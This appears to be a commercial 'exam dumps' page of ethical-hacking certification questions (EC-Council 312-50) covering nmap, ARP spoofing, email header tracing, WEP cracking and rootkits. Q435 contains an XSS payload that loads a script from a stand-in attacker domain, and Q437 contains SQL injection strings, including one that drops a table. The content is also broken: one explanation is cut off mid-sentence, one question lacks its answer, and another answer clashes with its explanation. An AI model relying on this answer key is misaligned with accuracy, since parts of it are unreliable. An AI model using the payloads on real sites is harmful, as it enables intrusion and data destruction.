10 Tips For 312-50 IT professionals

We provide validated EC-Council 312-50 downloads, which are the best for clearing the 312-50 test and getting certified in EC-Council Ethical Hacking and Countermeasures (CEHv6). The 312-50 Questions & Answers cover all the knowledge points of the real 312-50 exam. Crack your EC-Council 312-50 exam with the latest dumps, guaranteed!


Q431. While doing a fast scan using the -F option, which file does nmap use to list the range of ports to scan?

A. services 

B. nmap-services 

C. protocols 

D. ports 

Answer: B

Explanation: Nmap uses the nmap-services file to provide additional port detail for almost every scanning method. Every time a port is referenced, it's compared to an available description in this support file. If the nmap-services file isn't available, nmap reverts to the /etc/services file applicable for the current operating system. 

Q432. WinDump is a popular sniffer that results from porting TcpDump for Linux to Windows. What library does it use?

A. LibPcap 

B. WinPcap 

C. Wincap 

D. None of the above 

Answer: B

Explanation: WinPcap is the industry-standard tool for link-layer network access in Windows environments: it allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine and support for remote packet capture. 

Q433. Harold is the senior security analyst for a small state agency in New York. He has no other security professionals that work under him, so he has to do all the security-related tasks for the agency. Coming from a computer hardware background, Harold does not have a lot of experience with security methodologies and technologies, but he was the only one who applied for the position. 

Harold is currently trying to run a sniffer on the agency's network to get an idea of what kind of traffic is being passed around, but the program he is using does not seem to be capturing anything. He pores over the sniffer's manual but can't find anything that directly relates to his problem. Harold decides to ask the network administrator if he has any thoughts on the problem. Harold is told that the sniffer was not working because the agency's network is a switched network, which can't be sniffed by some programs without some tweaking.

What technique could Harold use to sniff the agency's switched network?

A. ARP spoof the default gateway 

B. Conduct MiTM against the switch 

C. Launch smurf attack against the switch 

D. Flood switch with ICMP packets 

Answer: A

Explanation: ARP spoofing, also known as ARP poisoning, is a technique used to attack an Ethernet network which may allow an attacker to sniff data frames on a local area network (LAN) or stop the traffic altogether (known as a denial of service attack). The principle of ARP spoofing is to send fake, or 'spoofed', ARP messages to an Ethernet LAN. These frames contain false MAC addresses, confusing network devices, such as network switches. As a result frames intended for one machine can be mistakenly sent to another (allowing the packets to be sniffed) or an unreachable host (a denial of service attack). 

Q434. The following is an email header. What address is that of the true originator of the message?

    Return-Path: <bgates@microsoft.com>
    Received: from smtp.com (fw.emumail.com [215.52.220.122])
        by raq-221-181.ev1.net (8.10.2/8.10.2) with ESMTP id h78NIn404807
        for <mikeg@thesolutionfirm.com>; Sat, 9 Aug 2003 18:18:50 -0500
    Received: (qmail 12685 invoked from network); 8 Aug 2003 23:25:25 -0000
    Received: from ([19.25.19.10])
        by smtp.com with SMTP
    Received: from unknown (HELO CHRISLAPTOP) (168.150.84.123)
        by localhost with SMTP; 8 Aug 2003 23:25:01 -0000
    From: "Bill Gates" <bgates@microsoft.com>
    To: "mikeg" <mikeg@thesolutionfirm.com>
    Subject: We need your help!
    Date: Fri, 8 Aug 2003 19:12:28 -0400
    Message-ID: <51.32.123.21@CHRISLAPTOP>
    MIME-Version: 1.0
    Content-Type: multipart/mixed;
        boundary="----=_NextPart_000_0052_01C35DE1.03202950"
    X-Priority: 3 (Normal)
    X-MSMail-Priority: Normal
    X-Mailer: Microsoft Outlook, Build 10.0.2627
    X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
    Importance: Normal

A. 19.25.19.10 

B. 51.32.123.21 

C. 168.150.84.123 

D. 215.52.220.122 

E. 8.10.2/8.10.2 

Answer: C

Explanation: Spoofing can be easily achieved by manipulating the "from" name field; however, it is much more difficult to hide the true source address. The "received from" IP address 168.150.84.123 is the true source of the

Q435. This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data. 

<a href="http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js%22%3E%3C/script%3E">See foobar</a>

What is this attack? 

A. Cross-site-scripting attack 

B. SQL Injection 

C. URL Traversal attack 

D. Buffer Overflow attack 

Answer: A

Q436. Which of the following is NOT true of cryptography? 

A. Science of protecting information by encoding it into an unreadable format 

B. Method of storing and transmitting data in a form that only those it is intended for can read and process 

C. Most (if not all) algorithms can be broken by both technical and non-technical means 

D. An effective way of protecting sensitive information in storage but not in transit 

Answer:

Explanation: Cryptography will protect data in both storage and in transit. 

Q437. Bank of Timbuktu was a medium-sized, regional financial institution in Timbuktu. The bank had recently deployed a new Internet-accessible Web application that customers could use to access their account balances, transfer money between accounts, pay bills and conduct online financial business using a Web browser.

John Stevens was in charge of information security at Bank of Timbuktu. After one month in production, several customers complained about the Internet-enabled banking application. Strangely, the account balances of many of the bank's customers had been changed!

However, money hadn’t been removed from the bank. Instead, money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web application’s logs and found the following entries: 

    Attempted login of unknown user: John
    Attempted login of unknown user: sysaR
    Attempted login of unknown user: sencat
    Attempted login of unknown user: pete '';
    Attempted login of unknown user: ' or 1=1--
    Attempted login of unknown user: '; drop table logins--
    Login of user jason, sessionID= 0x75627578626F6F6B
    Login of user daniel, sessionID= 0x98627579539E13BE
    Login of user rebecca, sessionID= 0x90627579944CCB811
    Login of user mike, sessionID= 0x9062757935FB5C64
    Transfer Funds user jason
    Pay Bill user mike
    Logout of user mike

What kind of attack did the Hacker attempt to carry out at the bank? (Choose the best answer) 

A. The Hacker attempted SQL Injection technique to gain access to a valid bank login ID. 

B. The Hacker attempted Session hijacking, in which the Hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID and took over Jason’s session. 

C. The Hacker attempted a brute force attack to guess login ID and password using password cracking tools. 

D. The Hacker used a random generator module to pass results to the Web server and exploited Web application CGI vulnerability. 

Answer: A

Explanation: The following part:

    Attempted login of unknown user: pete '';
    Attempted login of unknown user: ' or 1=1--
    Attempted login of unknown user: '; drop table logins--

clearly shows a hacker trying to perform a SQL injection by bypassing the login with the statement 1=1 and then dumping the logins table.

Q438. Why do you need to capture five to ten million packets in order to crack WEP with AirSnort? 

A. All IVs are vulnerable to attack 

B. AirSnort uses a cache of packets

C. AirSnort implements the FMS attack and only encrypted packets are counted

D. A majority of weak IVs transmitted by access points and wireless cards are not filtered by contemporary wireless manufacturers 

Answer: C

Explanation: Since the summer of 2001, WEP cracking has been a trivial but time consuming process. A few tools, AirSnort perhaps the most famous, that implement the Fluhrer-Mantin-Shamir (FMS) attack were released to the security community — who until then were aware of the problems with WEP but did not have practical penetration testing tools. Although simple to use, these tools require a very large number of packets to be gathered before being able to crack a WEP key. The AirSnort web site estimates the total number of packets at five to ten million, but the number actually required may be higher than you think. 

Q439. A remote user tries to log in to a secure network using Telnet, but accidentally types in an invalid user name or password. Which responses would NOT be preferred by an experienced Security Manager? (multiple answer)

A. Invalid Username 

B. Invalid Password 

C. Authentication Failure 

D. Login Attempt Failed 

E. Access Denied 

Answer: AB

Explanation: As little information as possible should be given about a failed login attempt. Invalid username or password is not desirable. 

Q440. Which of the following is the primary objective of a rootkit? 

A. It opens a port to provide an unauthorized service 

B. It creates a buffer overflow 

C. It replaces legitimate programs 

D. It provides an undocumented opening in a program 

Answer: C

Explanation: Actually the objective of the rootkit is more to hide the fact that a system has been compromised, and the normal way to do this is by replacing, for example, ls with a version that doesn't show the files and processes implanted by the attacker.
